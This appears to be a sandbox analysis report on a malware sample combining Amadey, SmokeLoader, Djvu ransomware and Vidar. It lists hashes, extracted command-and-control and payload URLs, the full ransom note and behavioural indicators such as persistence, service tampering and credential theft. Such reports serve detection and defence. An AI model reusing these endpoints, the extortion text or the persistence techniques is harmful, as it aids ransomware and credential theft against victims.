amadey | 8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8

Analysis

max time kernel
150s
max time network
151s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
02-04-2023 19:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe
Size

323KB
MD5

0e0f1d392c187051367c45706b6bdb25
SHA1

7beb096f9f8003a33045fe9d27b681dd8181c29d
SHA256

8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8
SHA512

08ef38e0c29bec65fecb705ded9bbcf21f52d85e5e51317a065c009a0bcc5e8883cc8c8094e10afefa164ea0f8c8e08f6cec60c59dc26acb8a9c9aad69ac7d3e
SSDEEP

3072:jvHh846f0aFSBR6CDpC73v3AOJzcQIj1Sv6JU8A7mNFky7xBY2+3oPpPZtkjc86:jKnffMBRwADjIy68ACN7PyI9Ztkjt

Score

10^/10

amadey djvu smokeloader vidar 5df88deb5dde677ba658b77ad5f60248 pub1 backdoor discovery evasion persistence ransomware spyware stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2022

http://potunulit.org/

http://hutnilior.net/

http://bulimu55t.net/

http://soryytlic4.net/

http://novanosa5org.org/

http://nuljjjnuli.org/

http://tolilolihul.net/

http://somatoka51hub.net/

http://hujukui3.net/

http://bukubuka1.net/

http://golilopaster.org/

http://newzelannd66.org/

http://otriluyttn.org/

http://aapu.at/tmp/

http://poudineh.com/tmp/

http://firsttrusteedrx.ru/tmp/

http://kingpirate.ru/tmp/

rc4.i32

Extracted

Family

djvu

http://zexeq.com/test2/get.php

http://zexeq.com/lancer/get.php

Attributes

extension
.nifr
offline_id
FCP2fiITr4rryFhFBnA59GMgwES5CunmcbPc76t1
payload_url
http://uaery.top/dl/build2.exe

http://zexeq.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-v8HcfXTy5x Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0679SUjhw

rsa_pubkey.plain

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

vidar

Version

3.2

Botnet

5df88deb5dde677ba658b77ad5f60248

https://steamcommunity.com/profiles/76561199489580435

https://t.me/tabootalks

Attributes

profile_id_v2
5df88deb5dde677ba658b77ad5f60248
user_agent
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 OPR/91.0.4516.79

Extracted

Family

amadey

Version

3.65

77.73.134.27/8bmdh3Slb2/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detected Djvu ransomware 45 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4956-133-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4548-136-0x0000000002550000-0x000000000266B000-memory.dmp	family_djvu
behavioral1/memory/4956-135-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4956-137-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4956-138-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4956-154-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1184-164-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1184-165-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2452-166-0x00000000025A0000-0x00000000026BB000-memory.dmp	family_djvu
behavioral1/memory/4820-168-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4820-170-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4820-172-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-174-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-175-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1184-184-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4820-185-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-187-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1184-191-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-194-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-196-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4820-195-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-200-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-206-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-208-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-213-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-215-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-216-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-219-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-220-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-221-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-222-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-224-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-226-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-228-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-229-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-233-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-235-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-234-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-236-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-237-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-243-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-242-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4592-253-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3380-380-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4992-382-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

XandETC.exe

description	pid	process	target process
PID 4456 created 3192	4456	XandETC.exe	Explorer.EXE
PID 4456 created 3192	4456	XandETC.exe	Explorer.EXE
PID 4456 created 3192	4456	XandETC.exe	Explorer.EXE
PID 4456 created 3192	4456	XandETC.exe	Explorer.EXE
PID 4456 created 3192	4456	XandETC.exe	Explorer.EXE

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exe

flow pid process

81 2232 rundll32.exe
83 2232 rundll32.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

Explorer.EXE

pid process

3192 Explorer.EXE

flow	pid	process
81	2232	rundll32.exe
83	2232	rundll32.exe

pid	process
3192	Explorer.EXE

Executes dropped EXE 33 IoCs

Processes:

C568.exeC568.exeD22A.exeC568.exeD44E.exeD22A.exeD44E.exeC568.exeDD87.exeDF4D.exeD22A.exeD44E.exeD22A.exeD44E.exebuild2.exebuild3.exebuild2.exebuild2.exe6259.exebuild2.exePlayer3.exebuild3.exe6D08.exebuild2.exess31.exebuild2.exenbveek.exeXandETC.exebuild3.exeB925.exemstsca.exenbveek.exeupdater.exe

pid	process
4548	C568.exe
4956	C568.exe
4748	D22A.exe
4420	C568.exe
2452	D44E.exe
1184	D22A.exe
4820	D44E.exe
4592	C568.exe
4408	DD87.exe
5044	DF4D.exe
5028	D22A.exe
4720	D44E.exe
3380	D22A.exe
4992	D44E.exe
4092	build2.exe
1216	build3.exe
864	build2.exe
4292	build2.exe
168	6259.exe
208	build2.exe
1028	Player3.exe
2652	build3.exe
2756	6D08.exe
2712	build2.exe
1788	ss31.exe
2752	build2.exe
4480	nbveek.exe
4456	XandETC.exe
4444	build3.exe
1608	B925.exe
4804	mstsca.exe
1512	nbveek.exe
4216	updater.exe

Loads dropped DLL 9 IoCs

Processes:

build2.exerundll32.exerundll32.exerundll32.exerundll32.exebuild2.exe

pid process

208 build2.exe
208 build2.exe
2232 rundll32.exe
2232 rundll32.exe
1784 rundll32.exe
2032 rundll32.exe
32 rundll32.exe
2712 build2.exe
2712 build2.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

4652 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
208	build2.exe
208	build2.exe
2232	rundll32.exe
2232	rundll32.exe
1784	rundll32.exe
2032	rundll32.exe
32	rundll32.exe
2712	build2.exe
2712	build2.exe

pid	process
4652	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

C568.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\cbc2b594-c459-4921-989f-4783fe6325ae\\C568.exe\" --AutoStart"	C568.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 api.2ip.ua
22 api.2ip.ua
23 api.2ip.ua
24 api.2ip.ua
31 api.2ip.ua
33 api.2ip.ua
9 api.2ip.ua

flow	ioc
10	api.2ip.ua
22	api.2ip.ua
23	api.2ip.ua
24	api.2ip.ua
31	api.2ip.ua
33	api.2ip.ua
9	api.2ip.ua

Suspicious use of SetThreadContext 16 IoCs

Processes:

C568.exeD22A.exeD44E.exeC568.exeD22A.exeD44E.exebuild2.exebuild2.exebuild2.exerundll32.exe

description	pid	process	target process
PID 4548 set thread context of 4956	4548	C568.exe	C568.exe
PID 4748 set thread context of 1184	4748	D22A.exe	D22A.exe
PID 2452 set thread context of 4820	2452	D44E.exe	D44E.exe
PID 4420 set thread context of 4592	4420	C568.exe	C568.exe
PID 5028 set thread context of 3380	5028	D22A.exe	D22A.exe
PID 4720 set thread context of 4992	4720	D44E.exe	D44E.exe
PID 4092 set thread context of 208	4092	build2.exe	build2.exe
PID 4292 set thread context of 2712	4292	build2.exe	build2.exe
PID 864 set thread context of 2752	864	build2.exe	build2.exe
PID 2232 set thread context of 2796	2232	rundll32.exe	rundll32.exe
PID 2232 set thread context of 3308	2232	rundll32.exe	rundll32.exe
PID 2232 set thread context of 316	2232	rundll32.exe	rundll32.exe
PID 2232 set thread context of 3836	2232	rundll32.exe	rundll32.exe
PID 2232 set thread context of 4768	2232	rundll32.exe	rundll32.exe
PID 2232 set thread context of 656	2232	rundll32.exe	rundll32.exe
PID 2232 set thread context of 1824	2232	rundll32.exe	rundll32.exe

Drops file in Program Files directory 1 IoCs

Processes:

XandETC.exe

description ioc process

File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1628 sc.exe
1820 sc.exe
2032 sc.exe
2132 sc.exe
376 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4272 5044 WerFault.exe DF4D.exe
2264 2756 WerFault.exe 6D08.exe
908 2032 WerFault.exe rundll32.exe

description	ioc	process
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe

pid	process
1628	sc.exe
1820	sc.exe
2032	sc.exe
2132	sc.exe
376	sc.exe

pid	pid_target	process	target process
4272	5044	WerFault.exe	DF4D.exe
2264	2756	WerFault.exe	6D08.exe
908	2032	WerFault.exe	rundll32.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exeDD87.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DD87.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DD87.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DD87.exe

Checks processor information in registry 2 TTPs 24 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exebuild2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1700 schtasks.exe
4160 schtasks.exe
2080 schtasks.exe
4412 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2300 timeout.exe

pid	process
1700	schtasks.exe
4160	schtasks.exe
2080	schtasks.exe
4412	schtasks.exe

pid	process
2300	timeout.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies registry class 64 IoCs

Processes:

rundll32.exeExplorer.EXErundll32.exerundll32.exerundll32.exerundll32.exerundll32.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e00310000000000825623ae100054656d7000003a0009000400efbe5456eb94825623ae2e0000000000000000000000000000000000000000000000000031e59800540065006d007000000014000000	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	rundll32.exe
